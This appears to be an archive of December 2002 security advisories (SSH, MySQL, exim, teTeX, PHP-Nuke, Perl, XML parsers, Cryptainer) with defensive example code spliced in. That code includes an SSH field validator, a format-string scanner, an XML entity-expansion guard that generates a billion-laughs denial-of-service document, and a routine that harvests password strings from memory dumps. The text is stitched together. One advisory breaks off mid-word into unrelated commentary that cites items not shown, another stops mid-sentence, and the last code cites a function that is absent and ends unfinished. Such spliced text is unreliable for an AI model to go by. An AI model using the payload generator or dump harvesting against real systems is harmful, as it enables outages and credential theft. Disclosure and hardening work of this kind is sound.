   WinSCP2
   http://winscp.vse.cz/eng/

  Vendor has been notified.  Release information is unknown at
  this time.

4. Solution

   No solutions available yet.

5. Detailed analysis

   To study the correctness and security of SSH server and client
   implementations {2}, the security research team at Rapid 7, Inc.
   has designed the SSHredder SSH protocol test suite containing
   hundreds of sample SSH packets. These invalid and/or atypical
   SSH packets focus on the greeting and KEXINIT (key exchange
   initialization) phases of SSH connections.

   We then applied the SSHredder suite to some popular SSH servers
   and clients, observing their behavior when presented with a
   range of different input.  Several implementation errors were
   discovered, most of which involve memory access violations.
   While the impact is different for each product tested, some of
   these errors were easily exploitable, allowing the attacker to
   overwrite the stack pointer with arbitrary data.

   In most cases, only the most current versions of the applications
   were tested.  Vendors listed as "Apparently NOT VULNERABLE" are
   encouraged to run the tests against older versions of their
   applications.

   The SSHr
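The four CVE candidates listed above each name one class of malformed field. As an added example that is neither Rapid 7's SSHredder nor any vendor's code, here is a defensive reader for the SSH2 "string" and "name-list" fields that make up a KEXINIT packet (a uint32 big-endian length followed by that many bytes; a name-list is such a string holding comma-separated names). The field-size cap, function names and sample byte strings are this example's own constructions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SSH_FIELD_MAX 4096u  /* example cap; a real implementation sizes this to its packet limit */

typedef struct {
    const uint8_t *p;  /* read cursor into the packet */
    size_t left;       /* bytes remaining after the cursor */
} sshbuf;

enum ssh_err {
    SSH_OK = 0,
    SSH_ERR_LENGTH,  /* field claims more bytes than the packet holds (CAN-2002-1357) */
    SSH_ERR_EMPTY,   /* empty name-list or empty list element        (CAN-2002-1358) */
    SSH_ERR_TOOBIG,  /* field larger than the implementation's cap    (CAN-2002-1359) */
    SSH_ERR_NUL      /* NUL byte inside a string field                (CAN-2002-1360) */
};

/* SSH2 "string": uint32 big-endian length, then that many bytes.
 * On success *out/*outlen describe the payload and the cursor advances;
 * on any error the cursor is untouched so the caller can abort cleanly.
 * The size cap is checked before the remaining-bytes check so a huge
 * length is classified as TOOBIG rather than merely as a length error. */
enum ssh_err ssh_get_string(sshbuf *b, const uint8_t **out, size_t *outlen)
{
    uint32_t n;
    if (b->left < 4) return SSH_ERR_LENGTH;
    n = ((uint32_t)b->p[0] << 24) | ((uint32_t)b->p[1] << 16) |
        ((uint32_t)b->p[2] << 8)  |  (uint32_t)b->p[3];
    if (n > SSH_FIELD_MAX) return SSH_ERR_TOOBIG;
    if (n > b->left - 4) return SSH_ERR_LENGTH;
    if (memchr(b->p + 4, '\0', n) != NULL) return SSH_ERR_NUL;
    *out = b->p + 4;
    *outlen = n;
    b->p += 4 + n;
    b->left -= 4 + n;
    return SSH_OK;
}

/* SSH2 "name-list": a string of comma-separated names. KEXINIT algorithm
 * lists must name at least one algorithm and may not contain empty
 * elements (leading, trailing or doubled commas). */
enum ssh_err ssh_get_namelist(sshbuf *b, const uint8_t **out, size_t *outlen)
{
    sshbuf save = *b;
    enum ssh_err e = ssh_get_string(b, out, outlen);
    if (e != SSH_OK) return e;
    if (*outlen == 0) { *b = save; return SSH_ERR_EMPTY; }
    for (size_t i = 0; i < *outlen; i++) {
        if ((*out)[i] != ',') continue;
        if (i == 0 || i + 1 == *outlen || (*out)[i + 1] == ',') {
            *b = save;
            return SSH_ERR_EMPTY;
        }
    }
    return SSH_OK;
}

/* Classify a packet that consists of a single name-list field. */
enum ssh_err check_namelist_packet(const uint8_t *pkt, size_t len)
{
    sshbuf b = { pkt, len };
    const uint8_t *s;
    size_t n;
    return ssh_get_namelist(&b, &s, &n);
}

/* Constructed sample fields: one well-formed, one per malformed class. */
static const uint8_t pkt_good[]    = { 0,0,0,10, 'a','e','s','1','2','8','-','c','b','c' };
static const uint8_t pkt_overrun[] = { 0,0,0,200, 'a','b' };                 /* length > data */
static const uint8_t pkt_huge[]    = { 0xFF,0xFF,0xFF,0xFF };                /* ~4 GiB field */
static const uint8_t pkt_empty[]   = { 0,0,0,9, '3','d','e','s',',',',','a','e','s' };
static const uint8_t pkt_nolist[]  = { 0,0,0,0 };                            /* empty name-list */
static const uint8_t pkt_nul[]     = { 0,0,0,4, 'a',0,'b','c' };

int main(void)
{
    static const char *names[] = { "OK", "LENGTH", "EMPTY", "TOOBIG", "NUL" };
    printf("good:    %s\n", names[check_namelist_packet(pkt_good, sizeof pkt_good)]);
    printf("overrun: %s\n", names[check_namelist_packet(pkt_overrun, sizeof pkt_overrun)]);
    printf("huge:    %s\n", names[check_namelist_packet(pkt_huge, sizeof pkt_huge)]);
    printf("empty:   %s\n", names[check_namelist_packet(pkt_empty, sizeof pkt_empty)]);
    printf("nolist:  %s\n", names[check_namelist_packet(pkt_nolist, sizeof pkt_nolist)]);
    printf("nul:     %s\n", names[check_namelist_packet(pkt_nul, sizeof pkt_nul)]);
    return 0;
}
```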

[OpenPKG-SA-2002.013] OpenPKG Security Advisory (mysql)

2002-12-16 Thread OpenPKG
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security Advisory                        The OpenPKG Project
http://www.openpkg.org/security.html             http://www.openpkg.org
[EMAIL PROTECTED]                                [EMAIL PROTECTED]
OpenPKG-SA-2002.013                              16-Dec-2002


Package: mysql
Vulnerability:   password bypass, arbitrary code execution
OpenPKG Specific:no

Dependent Packages:  apache, myodbc, perl-dbi, postfix

Affected Releases:   Affected Packages:          Corrected Packages:
OpenPKG 1.0          <= mysql-3.23.46-1.0.0      >= mysql-3.23.46-1.0.1
OpenPKG 1.1          <= mysql-3.23.52-1.1.0      >= mysql-3.23.52-1.1.1
OpenPKG CURRENT      <= mysql-3.23.53-20021204   >= mysql-3.23.54-20021212

Description:
  The e-matters [0] company discovered two flaws [1] within the MySQL
  [2] server that can be used by any MySQL user to crash the server.
  One of the flaws can be used to bypass the MySQL password check or
  to execute arbitrary code with the privileges of the user running
  mysqld(8).

  They also discovered an arbitrary size heap overflow within the
  MySQL client library and another vulnerability that allows writing
  a '\0' byte to any memory address. Both flaws could allow DoS attacks
  against, or arbitrary code execution within, anything linked against
  libmysqlclient.

  Check whether you are affected by running "/bin/rpm -q mysql".
  If you have an affected version of the "mysql" package (see above),
  please upgrade it according to the solution below.

Solution:
  Update existing packages to newly patched versions of MySQL. Select the
  updated source RPM appropriate for your OpenPKG release [3][4][5], and
  fetch it from the OpenPKG FTP service or a mirror location. Verify its
  integrity [6], build a corresponding binary RPM from it and update your
  OpenPKG installation by applying the binary RPM [7]. For the latest
  OpenPKG 1.1 release, perform the following operations to permanently fix
  the security problem (for other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/1.1/UPD
  ftp> get mysql-3.23.52-1.1.1.src.rpm
  ftp> bye
  $ /bin/rpm -v --checksig mysql-3.23.52-1.1.1.src.rpm
  $ /bin/rpm --rebuild mysql-3.23.52-1.1.1.src.rpm
  $ su -
  # /bin/rpm -Fvh /RPM/PKG/mysql-3.23.52-1.1.1.*.rpm
  # /etc/rc mysql stop start


References:
  [0] http://www.e-matters.de/
  [1] http://security.e-matters.de/advisories/042002.html
  [2] http://www.mysql.com/
  [3] ftp://ftp.openpkg.org/release/1.0/UPD/
  [4] ftp://ftp.openpkg.org/release/1.1/UPD/
  [5] ftp://ftp.openpkg.org/current/SRC/
  [6] http://www.openpkg.org/security.html#signature
  [7] http://www.openpkg.org/tutorial.html#regular-source


For security reasons, this advisory was digitally signed with
the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F)
of the OpenPKG project which you can find under the official URL
http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To
check the integrity of this advisory, verify its digital signature by
using GnuPG (http://www.gnupg.org/). For example, pipe this message to
the command "gpg --verify --keyserver keyserver.pgp.com".

-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iEYEARECAAYFAj39rFwACgkQgHWT4GPEy59OOQCfRNp25g3jXbRoIITZnwnpT7lo
0q8AoMCazmZmwIs0sqxUJF4wfwbsC6Zz
=6WvF
-END PGP SIGNATURE-



GLSA: exim

2002-12-16 Thread Daniel Ahlberg
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - 
GENTOO LINUX SECURITY ANNOUNCEMENT 200212-5
- - 

PACKAGE : exim
SUMMARY : local root vulnerability
DATE    : 2002-12-16 16:12 UTC
EXPLOIT : local

- - 

- From advisory:

"This is a format string bug in daemon.c, line 976:

sprintf(CS buff, CS pid_file_path, "");   /* Backward compatibility */

pid_file_path can be changed on the command line.
This line is in the function daemon_go(), which only
gets executed when the user is an exim-admin-user."

Read the full advisory at
http://marc.theaimsgroup.com/?l=bugtraq&m=103903403527788&w=2

SOLUTION

It is recommended that all Gentoo Linux users who are running
net-mail/exim-4.05 and earlier update their systems as follows:

emerge rsync
emerge exim
emerge clean

- - 
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
[EMAIL PROTECTED]
- - 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE9/gBNfT7nyhUpoZMRAq43AKCfp65F8XNHS5Td8CE1qQiNqvrT9QCeJUTB
6MYY1rust/c7RtKpA78PAv4=
=IZpj
-END PGP SIGNATURE-
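
The quoted line hands pid_file_path, which the advisory says can be set on the command line, to sprintf() as its format string. The following is an added Python example, not exim's code and not the fix exim shipped: a scanner that parses a string the way printf would, listing each conversion it would act on, how many variadic arguments it would consume and whether it writes to memory (%n), plus the check a string must pass before it may be used as a format. The generic remedy is to keep the format constant and pass the variable text as an argument, i.e. snprintf(buff, sizeof buff, "%s", pid_file_path).

```python
import re

# One C99 printf directive: %[flags][width][.precision][length]conversion
DIRECTIVE = re.compile(
    r"%(?P<flags>[-+ #0]*)(?P<width>\*|[1-9]\d*)?(?:\.(?P<prec>\*|\d*))?"
    r"(?P<length>hh|h|ll|l|j|z|t|L)?(?P<conv>[diouxXeEfFgGaAcspn%])"
)


def scan_format(fmt):
    """Parse fmt as printf would and describe every directive it contains.
    '%%' is a literal percent sign and is not reported. A '%' that starts no
    valid directive is reported as 'stray': printf's behaviour on it is
    undefined, so it is just as disqualifying."""
    found, pos = [], 0
    while True:
        i = fmt.find("%", pos)
        if i < 0:
            return found
        m = DIRECTIVE.match(fmt, i)
        if m is None:
            found.append({"directive": fmt[i], "conversion": None, "args": 0,
                          "writes_memory": False, "stray": True})
            pos = i + 1
            continue
        pos = m.end()
        conv = m.group("conv")
        if conv == "%":
            continue
        # A '*' width or precision each consumes one extra int argument.
        args = 1 + (m.group("width") == "*") + (m.group("prec") == "*")
        found.append({"directive": m.group(0), "conversion": conv, "args": args,
                      "writes_memory": conv == "n", "stray": False})


def args_consumed(fmt):
    """Variadic arguments printf would read. Every one beyond what the caller
    passed is read from wherever the calling convention puts the next one,
    which is how a format string leaks or corrupts the stack."""
    return sum(d["args"] for d in scan_format(fmt))


def is_safe_as_format(fmt):
    """True only if the string, used as a format, consumes no arguments,
    writes nothing and has no stray '%'. Attacker-influenced text that fails
    this must be passed as the argument of a fixed "%s" format instead."""
    return all(not d["stray"] and d["args"] == 0 for d in scan_format(fmt))
```

Run scan_format() over any string that reaches a printf-family call as the format argument (configuration values, command-line options, file names); a non-empty result is a finding, and a directive with writes_memory set is the one that turns a crash into a write primitive.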



[OpenPKG-SA-2002.015] OpenPKG Security Advisory (tetex)

2002-12-16 Thread OpenPKG
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security.html                 http://www.openpkg.org
[EMAIL PROTECTED]                                    [EMAIL PROTECTED]
OpenPKG-SA-2002.015                                  16-Dec-2002


Package:             tetex
Vulnerability:       remote command execution
OpenPKG Specific:    no

Dependent Packages:  none

Affected Releases:   Affected Packages:         Corrected Packages:
OpenPKG 1.0          <= tetex-1.0.7-1.0.0       >= tetex-1.0.7-1.0.1
OpenPKG 1.1          <= tetex-1.0.7-1.1.0       >= tetex-1.0.7-1.1.1
OpenPKG CURRENT      <= tetex-1.0.7-20021204    >= tetex-1.0.7-20021216

Description:
  A vulnerability [1] in the kpathsea(3) library of teTeX was
  discovered. This library is used by xdvi(1) and dvips(1). Both
  programs call the system(3) function insecurely, which allows a remote
  attacker to execute arbitrary commands via cleverly crafted DVI files.
  If dvips(1) is used in a print filter, this allows a local or remote
  attacker with print permission to execute arbitrary code as the printing
  system user.

  Check whether you are affected by running "/bin/rpm -q tetex".
  If you have an affected version of the samba package (see above),
  please upgrade it according to the solution below.

Solution:
  Update existing packages to newly patched versions of teTeX. Select the
  updated source RPM appropriate for your OpenPKG release [2][3][4], and
  fetch it from the OpenPKG FTP service or a mirror location. Verify its
  integrity [5], build a corresponding binary RPM from it and update your
  OpenPKG installation by applying the binary RPM [6]. For the latest
  OpenPKG 1.1 release, perform the following operations to permanently fix
  the security problem (for other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/1.1/UPD
  ftp> get tetex-1.0.7-1.1.1.src.rpm
  ftp> bye
  $ /bin/rpm -v --checksig tetex-1.0.7-1.1.1.src.rpm
  $ /bin/rpm --rebuild tetex-1.0.7-1.1.1.src.rpm
  $ su -
  # /bin/rpm -Fvh /RPM/PKG/tetex-1.0.7-1.1.1.*.rpm


References:
  [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0836
  [2] ftp://ftp.openpkg.org/release/1.0/UPD/
  [3] ftp://ftp.openpkg.org/release/1.1/UPD/
  [4] ftp://ftp.openpkg.org/current/SRC/
  [5] http://www.openpkg.org/security.html#signature
  [6] http://www.openpkg.org/tutorial.html#regular-source


For security reasons, this advisory was digitally signed with
the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F)
of the OpenPKG project which you can find under the official URL
http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To
check the integrity of this advisory, verify its digital signature by
using GnuPG (http://www.gnupg.org/). For example, pipe this message to
the command "gpg --verify --keyserver keyserver.pgp.com".

-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iEYEARECAAYFAj3+AOwACgkQgHWT4GPEy59EaQCg3nIl3ru+vU27i/Wcqm+cUH5N
/tAAn0QY3lN4bmUtNXIwMGsGitW2LMsz
=6F8t
-END PGP SIGNATURE-



PHP-Nuke code execution and XSS vulnerabilities

2002-12-16 Thread Ulf Harnhammar
PHP-Nuke code execution and XSS vulnerabilities


PROGRAM: PHP-Nuke
VENDOR: Francisco Burzi et al.
HOMEPAGE: http://phpnuke.org/
VULNERABLE VERSIONS: 6.0 (the only supported version)
IMMUNE VERSIONS: 6.0 with my patch applied
LOGIN REQUIRED: no


DESCRIPTION:

"PHP-Nuke is a Web portal and online community system which
includes Web-based administration, surveys, access statistics,
user customizable boxes, a themes manager for registered users,
friendly administration GUI with graphic topic manager, the
ability to edit or delete stories, an option to delete comments,
a moderation system, referer tracking, integrated banner ad system,
search engine, backend/headlines generation (RSS/RDF format), Web
directory like Yahoo, events manager, and support for 20+ languages."

(direct quote from the program's project page at Freshmeat)

PHP-Nuke is published under the terms of the GNU General Public
License. It is a very popular program with lots and lots of
installations. It is included as one of the packages in Debian
GNU/Linux and one of FreeBSD's ports.

Despite all this, the program has a bad reputation regarding
security matters.


SUMMARY:

PHP-Nuke has a module that implements a web mail system. When a
user reads an e-mail message with an attached file, the file in
question is stored in a web accessible directory under its normal
file name. Files with active web content, such as CGI or PHP scripts,
are handled the same way.

The module also has a cross-site scripting hole. Either problem
is serious in its own right, but when we combine them, we end up
with something very serious: an e-mail message that automatically
executes an attached PHP script when someone opens it!


TECHNICAL DETAILS:

As stated above, PHP-Nuke has got a web mail system, and it stores
attachments under their real file names in a directory where anyone
can surf to them.

There is nothing in the code that stops active content, such as
PHP scripts, from being stored in that directory. There is also no
warning against this in the program's documentation. As a result, any
attacker can execute any PHP script on the web server. The attacker
first sends the script as an attachment to any user who will read
that message in PHP-Nuke's web mail system. The attacker then waits
for the user to open the message, and finally the attacker just
surfs to a predictable WWW location. The user doesn't even have to
open the attachment, just the mail that it comes in.

As a bonus, the web mail system also has a Cross-Site Scripting
vulnerability. It doesn't remove 

[OpenPKG-SA-2002.014] OpenPKG Security Advisory (perl)

2002-12-16 Thread OpenPKG
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



OpenPKG Security Advisory                            The OpenPKG Project
http://www.openpkg.org/security.html                 http://www.openpkg.org
[EMAIL PROTECTED]                                    [EMAIL PROTECTED]
OpenPKG-SA-2002.014                                  16-Dec-2002


Package:             perl
Vulnerability:       unsafe Safe compartment
OpenPKG Specific:    no

Dependent Packages:  none

Affected Releases:   Affected Packages:        Corrected Packages:
OpenPKG 1.0          <= perl-5.6.1-1.0.1       >= perl-5.6.1-1.0.2
OpenPKG 1.1          <= perl-5.6.1-1.1.0       >= perl-5.6.1-1.1.1
OpenPKG CURRENT      <= perl-5.8.0-20021129    >= perl-5.8.0-20021216

Description:
  Andreas Jurenda discovered [0] a security hole in Safe.pm for Perl
  [1]. When a Safe compartment has already been used, there's no
  guarantee that it's safe any longer, because there's a way for code
  executed within the Safe compartment to alter its operation mask.
  Programs that use a Safe compartment only once aren't affected by this
  bug.

  Check whether you are affected by running "/bin/rpm -q perl".
  If you have an affected version of the Perl package (see above),
  please upgrade it according to the solution below.

Solution:
  Update existing packages to newly patched versions of Perl. Select the
  updated source RPM appropriate for your OpenPKG release [2][3][4], and
  fetch it from the OpenPKG FTP service or a mirror location. Verify its
  integrity [5], build a corresponding binary RPM from it and update your
  OpenPKG installation by applying the binary RPM [6]. For the latest
  OpenPKG 1.1 release, perform the following operations to permanently fix
  the security problem (for other releases adjust accordingly).

  $ ftp ftp.openpkg.org
  ftp> bin
  ftp> cd release/1.1/UPD
  ftp> get perl-5.6.1-1.1.1.src.rpm
  ftp> bye
  $ /bin/rpm -v --checksig perl-5.6.1-1.1.1.src.rpm
  $ /bin/rpm --rebuild perl-5.6.1-1.1.1.src.rpm
  $ su -
  # /bin/rpm -Fvh /RPM/PKG/perl-5.6.1-1.1.1.*.rpm


References:
  [0] http://bugs6.perl.org/rt2/Ticket/Display.html?user=guest&pass=guest&id=17744
  [1] http://www.perl.com/
  [2] ftp://ftp.openpkg.org/release/1.0/UPD/
  [3] ftp://ftp.openpkg.org/release/1.1/UPD/
  [4] ftp://ftp.openpkg.org/current/SRC/
  [5] http://www.openpkg.org/security.html#signature
  [6] http://www.openpkg.org/tutorial.html#regular-source


For security reasons, this advisory was digitally signed with
the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F)
of the OpenPKG project which you can find under the official URL
http://www.openpkg.org/openpkg.pgp or on http://keyserver.pgp.com/. To
check the integrity of this advisory, verify its digital signature by
using GnuPG (http://www.gnupg.org/). For example, pipe this message to
the command "gpg --verify --keyserver keyserver.pgp.com".

-BEGIN PGP SIGNATURE-
Comment: OpenPKG <[EMAIL PROTECTED]>

iEYEARECAAYFAj3+AJgACgkQgHWT4GPEy58V+gCg7izWdygkK12AbXPpY2izzuWb
wA4AoMG3rg9EUfy1fkimlOl5zxoAsLho
=ZxAt
-END PGP SIGNATURE-



Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD

2002-12-16 Thread Amit Klein
///
>> Security Advisory <<
///



Multiple vendors XML parser (and SOAP/WebServices server)
Denial of Service attack using DTD


=> Author: Amit Klein - Sanctum inc. http://www.sanctuminc.com/

=> Release date: 16/Dec/2002

=> Vendor: Multiple vendors

The following products were found to be vulnerable:

 - The Expat Developers Expat XML parser

 - Apache Group Xerces XML parser

 - IBM WebSphere

 - Sun Microsystems SunONE

 - Apache Group Apache Axis

 - Macromedia ColdFusion/MX (Professional, Enterprise, J2EE
 Editions released through October, 2002)

 - Macromedia JRun 4.0

 - Sybase EAServer v4.1, v4.1.1, v4.1.2, v4.1.3

 - BEA WebLogic Integration 2.1, 7.0

 - BEA WebLogic Server/Express 6.0, 6.1, 7.0, 7.0.0.1

 - HP (undisclosed list of products)

 - Other products from other vendors are known to be vulnerable too

Where not explicitly stated, the versions affected are the latest ones
(as of October 2002).

All vendors mentioned were informed, directly or indirectly, by November 25th.

=> Severity: High

=> CVE candidate: Not assigned yet.

=> BugTraq ID assigned: 6363 (Macromedia products), 6378 (BEA products)

=> Summary: Using the DTD part of the XML document, it is possible to
cause the XML parser to consume 100% CPU and/or a lot of memory, therefore
resulting in a denial of service condition.

=> Solution/Vendor response:

Macromedia ColdFusion/MX: Macromedia has issued a bulletin regarding
this problem, and links to product patches can be found therein:
http://www.macromedia.com/v1/handlers/index.cfm?ID=23559
 
Macromedia JRun: Macromedia has issued a bulletin regarding this problem,
and links to product patches can be found therein:
http://www.macromedia.com/v1/handlers/index.cfm?ID=23559

Sybase EAServer: Sybase has issued a bulletin regarding this problem,
and links to product patches can be found therein:
http://my.sybase.com/detail?id=1022856

BEA WebLogic Integration: BEA has issued a bulletin regarding this problem,
and links to product patches can be found therein:
http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?highlight=advisoriesnotifications&path=components%2Fdev2dev%2Fresourcelibrary%2Fadvisoriesnotifications%2FBEA02-23.htm

BEA WebLogic Server/Express: BEA has issued a bulletin regarding this
problem, and links to product patches can be found therein:
http://dev2dev.bea.com/resourcelibrary/advisoriesdetail.jsp?highlight=advisoriesnotifications&path=components%2Fdev2dev%2Fresourcelibrary%2Fadvisoriesnotifications%2FBEA02-23.htm

HP Products: HP requested that the following text appear in this advisory:
 -
SOURCE:  Hewlett-Packard Company
Software Security Response Team

HP SSRT case # SSRT2426

At the time of writing this document, HP is
currently investigating the potential impact
to HP's released Operating System software products.

As further information becomes available HP will provide notice
of the availability of any necessary patches through
standard security bulletin announcements and be
available from your normal HP Services support channel.
 -

=> Workaround:

If possible, disable DTD in the XML parser. This requires raw access to
the XML parser API, which is usually impossible for Web Services applications.

=> Acknowledgements

- Ory Segal from Sanctum, for his help in developing a generic exploit.

- Tom Donovan and Stephen Dupre from Macromedia (and the rest of the
Macromedia team) for their promptness and help with the interaction with
other vendors.
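
The workaround above, applied at the parser API, as an added Python example (not code from this advisory or from any vendor listed): it drives expat, one of the parsers named, through Python's xml.parsers.expat. With allow_dtd=False any DOCTYPE is refused. With allow_dtd=True an internal subset is accepted, but when the DTD closes every entity's fully expanded size is computed from the declarations, and parsing stops before a single reference is expanded if any entity would exceed the budget. billion_laughs() builds the constructed sample document; the 10,000-byte budget is an assumed policy value.

```python
import re
import xml.parsers.expat as expat

ENTITY_REF = re.compile(r"&([A-Za-z_][\w.-]*);")
PREDEFINED = {"amp", "lt", "gt", "apos", "quot"}   # each expands to one character


class DtdRejected(Exception):
    pass


class GuardedParser:
    """Expat with its DTD surface closed off. allow_dtd=False refuses any
    DOCTYPE (the advisory's workaround). allow_dtd=True admits an internal
    subset but rejects external and parameter entities, and aborts at the end
    of the DTD if any entity would expand beyond max_expansion bytes."""

    def __init__(self, allow_dtd=False, max_expansion=10_000):
        self.allow_dtd, self.max_expansion = allow_dtd, max_expansion
        self.entity_values = {}          # name -> literal replacement text
        self.entity_size = {}            # name -> fully expanded length
        self.elements, self.text = 0, []
        p = expat.ParserCreate()
        p.StartDoctypeDeclHandler = self._doctype
        p.EntityDeclHandler = self._entity
        p.EndDoctypeDeclHandler = self._end_doctype
        p.ExternalEntityRefHandler = self._external
        p.StartElementHandler = self._start
        p.CharacterDataHandler = self.text.append
        self.p = p

    def _doctype(self, name, sysid, pubid, has_internal_subset):
        if not self.allow_dtd:
            raise DtdRejected("DOCTYPE not permitted")
        if sysid or pubid:
            raise DtdRejected("external DTD subset not permitted")

    def _entity(self, name, is_param, value, base, sysid, pubid, notation):
        if is_param or value is None:    # parameter or external entity: no use in a payload
            raise DtdRejected("entity %r is a parameter or external entity" % name)
        self.entity_values[name] = value

    def _end_doctype(self):
        # Sizes are computed once all declarations are known, so an entity that
        # refers to one declared later cannot hide from the estimate.
        def size_of(name, stack=()):
            if name in stack:
                raise DtdRejected("recursive entity %r" % name)
            if name not in self.entity_size:
                value = self.entity_values.get(name, "")
                total = len(value)
                for m in ENTITY_REF.finditer(value):
                    ref = m.group(1)
                    inner = 1 if ref in PREDEFINED else size_of(ref, stack + (name,))
                    total += inner - len(m.group(0))     # reference text is replaced
                if total > self.max_expansion:
                    raise DtdRejected("entity %r would expand to %d bytes" % (name, total))
                self.entity_size[name] = total
            return self.entity_size[name]
        for name in list(self.entity_values):
            size_of(name)

    def _external(self, context, base, sysid, pubid):
        raise DtdRejected("external entity reference")

    def _start(self, name, attrs):
        self.elements += 1

    def parse(self, document):
        """Returns (element_count, character_data). Raises DtdRejected before
        any expansion takes place, or expat.ExpatError for ordinary bad XML."""
        self.p.Parse(document, True)
        return self.elements, "".join(self.text)


def billion_laughs(levels, fanout=10):
    """Constructed sample: the classic nested-entity document, `levels` deep."""
    decls = ['<!ENTITY lol0 "lol">']
    for i in range(1, levels + 1):
        decls.append('<!ENTITY lol%d "%s">' % (i, ("&lol%d;" % (i - 1)) * fanout))
    return "<!DOCTYPE lolz [%s]><lolz>&lol%d;</lolz>" % ("".join(decls), levels)


def outcome(document, **opts):
    """Parse under the given options and report 'ok', 'rejected' or 'malformed'."""
    try:
        return ("ok",) + GuardedParser(**opts).parse(document)
    except DtdRejected:
        return ("rejected",)
    except expat.ExpatError:
        return ("malformed",)
```

The estimate bounds each declared entity; a modest entity referenced many thousands of times in the body is capped only per reference, so a total budget on character data is still worth enforcing. For a SOAP endpoint the simplest policy is the advisory's own: allow_dtd=False, since no Web Services payload legitimately carries a DOCTYPE.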





Password Disclosure in Cryptainer

2002-12-16 Thread K. K. Mookhey
===
Advisory: Password Disclosure in Cryptainer
Vendor: SecureSoft http://www.cypherix.com
Download Location: http://www.cypherix.com/downloads.htm
Versions affected: Cryptainer PE and Cryptainer 2.0
Date: 16th December 2002
Type of Vulnerability: Information Disclosure in Memory of Process
Severity: Medium

Discovered by: K. K. Mookhey ([EMAIL PROTECTED])
Network Intelligence India Pvt. Ltd. (http://www.nii.co.in)
Online location: http://www.nii.co.in/vuln/crypt.html
===


Background:
=
From vendor website: "Cryptainer PE's ease of use together with its powerful
448 bit strong encryption provides file security without changing the way you
work. It creates a 100MB encrypted drive that can be loaded and unloaded as
required. It combines ease of use and simple drag-and-drop operations with
powerful 448 bit strong encryption ensuring total security with phenomenal
ease of use and maximum convenience!"
Both products use the Blowfish algorithm.


Description:
=
Both the versions of Cryptainer store the password in clear text in the memory
of the process without encrypting it or nullifying it. This password is clearly
visible as long as the following two conditions are satisfied:
1. The user has entered the password at least once
2. Cryptainer is loaded
The encrypted volume may or may not be loaded.
Since this product comes with an option to minimize to the System Tray, it is
quite likely that the user would keep Cryptainer running without loading the
encrypted volume containing the encrypted files. In such a case, a user might
assume that since the encrypted volume is not loaded, his files are safe. But an
intruder who is able to dump the memory of the running process can ferret out
the password with relative ease. Besides the password, the physical path of the
volume is also clearly visible.
Also Cryptainer does not provide a limit to the number of wrong password
attempts. So an intruder must collect the memory dump, and copy the physical
location of the logical volume (which is actually one big file) onto his
machine, and then run Cryptainer and check all the strings in the memory dump
for the correct password.


References:
=
A similar vulnerability was found in Password Safe written by crypto-guru
Bruce Schneier. This was acknowledged by him and addressed by the developer of
the open source version of this product. Bruce Schneier's response is here:
http://www.counterpane.com/crypto-gram-0111.html#6


Impact:
=
First of all, the intruder would need to have physical access to the PC in order
to gather a physical dump. Moreover, it would be necessary to have Cryptainer
running - either with the encrypted volume loaded or unloaded. This however is
not so uncommon. On the other hand, it is in the event of a physical intrusion
that one would need the encryption software to protect one's data. Therefore, the
physical access event must be assumed as having occurred. Then, the
estimated probability of a compromise must be that of Cryptainer running in the
System Tray, and the user having used the software at least once.


Vendor Response:
=
The vendor response is somehow not so clear. We have corresponded with them
repeatedly since November 23rd. The essence that we have been able to make out
is that they will probably look into it in their next release sometime in the
first quarter of 2003. Their contention is also that with the kind of physical
access required for this to work, the intruder might as well install a keylogger.


Workaround:
==
Do not keep Cryptainer minimized in the System Tray even if you have unloaded
the encrypted volume. Exit the software as soon as you have finished
encrypting/decrypting the files, by clicking on the Shutdown and Exit button.


Note:

The software is still pretty secure, and if you do not keep Cryptainer in the
System Tray you should be safe.


K. K. Mookhey
CTO,
Network Intelligence India Pvt. Ltd.
Tel: 91-22-22001530, 22006019
Email: [EMAIL PROTECTED]
Web: www.nii.co.in
=
The Unix Auditor's Practical Handbook
http://www.nii.co.in/tuaph.html
=
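
Both halves of the advisory in an added Python example (not Cryptainer's code; its real key derivation is not on the page, so PBKDF2-SHA256 stands in for it): harvest_strings() does what an intruder does with a memory dump, guess_from_image() is the unlimited-attempt loop the advisory describes, and unlock_volume() shows the behaviour the advisory says is missing, overwriting the password buffer as soon as it has been used. snapshot() builds a constructed stand-in for a process dump; the password, salt, volume path and KDF cost are constructed values.

```python
import hashlib
import re
import secrets

MIN_LEN = 6
PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
ITERATIONS = 20_000   # assumed KDF cost for the stand-in; Cryptainer's scheme is not on the page


def harvest_strings(image):
    """What strings(1) does to a memory image: every printable ASCII run of
    MIN_LEN or more characters, in order of appearance, without duplicates."""
    seen, out = set(), []
    for m in PRINTABLE_RUN.finditer(image):
        s = m.group(0).decode("ascii")
        if s not in seen:
            seen.add(s)
            out.append(s)
    return out


def derive_key(password, salt):
    """Stand-in for the volume key derivation (assumption: PBKDF2-SHA256).
    Accepts any bytes-like object, so a bytearray can be passed without first
    copying it into an immutable bytes object that would linger in memory."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, ITERATIONS, 32)


def wipe(buf):
    """Overwrite a mutable buffer in place. A str or bytes cannot be wiped."""
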